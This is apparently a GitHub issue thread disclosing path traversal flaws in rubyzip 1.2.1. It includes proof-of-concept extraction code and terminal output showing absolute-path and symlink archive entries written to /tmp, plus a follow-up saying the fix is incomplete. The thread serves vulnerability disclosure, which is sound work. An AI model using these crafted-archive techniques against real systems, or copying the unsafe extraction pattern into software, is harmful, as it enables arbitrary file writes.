Several directory traversal vulnerabilities

[tuzovakaoff]

Overview

This issue is similar to already closed #315 but I found two ways to bypass that fix.

You can find files for tests in https://github.com/tuzovakaoff/zip_path_traversal

Proof of concept:

rubyzip.rb

require 'zip'
first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

1. Files with absolute path

UnZip strips absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> unzip absolutepath.zip
Archive:  absolutepath.zip
warning:  stripped absolute path spec from /tmp/
   creating: tmp/
warning:  stripped absolute path spec from /tmp/file.txt
  inflating: tmp/file.txt

> ls
absolutepath.zip	symlink.zip
rubyzip.rb		tmp

rubyzip extracts files with absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ruby rubyzip.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ls /tmp
file.txt

2. Archive with symbolic link

UnZip extracts only symbolic link

> unzip symlink.zip
Archive:  symlink.zip
    linking: path                    -> ../../../../../tmp
checkdir error:  path exists but is not directory
                 unable to process path/file.txt.
finishing deferred symbolic links:
  path                   -> ../../../../../tmp


> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:19 path -> ../../../../../tmp

rubyzip extracts symbolic link and puts file into /tmp folder

> ruby rubyzip.rb symlink.zip 
Extracting path
Extracting path/file.txt

> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:22 path -> ../../../../../tmp

>ls /tmp
file.txt

Vulnerable version and test environment

> uname -rsv
Darwin 17.6.0 Darwin Kernel Version 17.6.0: Tue May  8 15:22:16 PDT 2018; root:xnu-4570.61.1~1/RELEASE_X86_64

> ruby -v
ruby 2.5.0p0 (2017-12-25 revision 61468) [x86_64-darwin17]

> gem list | grep zip
rubyzip (1.2.1)

> uname -rsv
Linux 2.6.32-573.18.1.el6.x86_64 #1 SMP Tue Feb 9 22:46:17 UTC 2016

> ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]

> gem list | grep zip
rubyzip (1.2.1)

[abergmann]

CVE-2018-1000544 was assigned to this issue.

[mrtc0]

Hi,

I think that this fix is inadequate.
The following code can still Pass Traversal and extract to /tmp/ .

$ zipinfo absolutepath.zip
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-14 05:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-14 05:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%

require 'zip'

Zip::File.open("./absolutepath.zip") do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    # entry.extract(File.join(test_path, entry.name))
    entry.extract(entry.name)
  end
end

I think that If not specify the destination directory, it should be expanded to the current directory.
What do you think about this?